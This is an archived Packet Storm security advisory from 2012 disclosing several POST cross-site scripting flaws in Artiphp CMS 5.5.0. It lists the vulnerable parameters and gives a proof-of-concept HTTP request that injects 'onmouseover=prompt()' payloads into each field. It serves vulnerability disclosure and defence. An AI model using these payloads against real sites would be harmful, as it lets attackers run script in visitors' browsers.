exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Artiphp CMS 5.5.0 Cross Site Scripting

Artiphp CMS 5.5.0 Cross Site Scripting
Posted May 17, 2012
Authored by LiquidWorm | Site zeroscience.mk

Artiphp CMS version 5.5.0 suffers from multiple POST cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 7a4376013ae27e84c455c4635174e7c9d3e1f35f0efd073c63ffb7ec3323f459

Artiphp CMS 5.5.0 Cross Site Scripting

Change Mirror Download

Artiphp CMS v5.5.0 Multiple XSS POST Injection Vulnerabilities

Vendor: Artiphp
Product web page: http://www.artiphp.com
Affected version: 5.5.0 Neo (r422)

Summary: Artiphp is a content management system (CMS) open and free to create and manage your website.

Desc: Artiphp CMS suffers from multiple cross-site scripting vulnerabilities via several parameters thru POST method.
Attackers can exploit these weaknesses to execute arbitrary HTML and script code in a user's browser session.


======================================================================================================================
PARAM METHOD SCRIPT
======================================================================================================================

add_img_name_post POST /artpublic/recommandation/index.php
----------------------------------------------------------------------------------------------------------------------
asciiart_post POST /artpublic/recommandation/index.php
----------------------------------------------------------------------------------------------------------------------
expediteur POST /artpublic/recommandation/index.php
----------------------------------------------------------------------------------------------------------------------
titre_sav POST /artpublic/recommandation/index.php
----------------------------------------------------------------------------------------------------------------------
z39d27af885b32758ac0e7d4014a61561 POST /artpublic/recommandation/index.php

======================================================================================================================


Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
PHP 5.3.8
MySQL 5.5.20


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2012-5090
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5090.php


15.05.2012

--


======================================================================================================================


POST /artpublic/recommandation/index.php HTTP/1.1
Content-Length: 619
Content-Type: application/x-www-form-urlencoded
Cookie: ARTI=tsouvg67cld88k9ihbqfgk3k77
Host: localhost:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)

add_img_name_post "onmouseover=prompt(1) joxy
adresse_destinataire
adresse_expediteur lab%40zeroscience.mk
asciiart_post "onmouseover=prompt(2) joxy
expediteur "onmouseover=prompt(3) joxy
message Hello%20World
message1 %ef%bf%bd%20Recommand%20%ef%bf%bd%0a%bb%20http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
send Send
titre_sav "onmouseover=prompt(4) joxy
url_sav http%3a%2f%2flocalhost%2fartpublic%2frecommandation%2f
z39d27af885b32758ac0e7d4014a61561 "onmouseover=prompt(5) joxy
zd178e6cdc57b8d6ba3024675f443e920 2


=====================================================================================================================
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close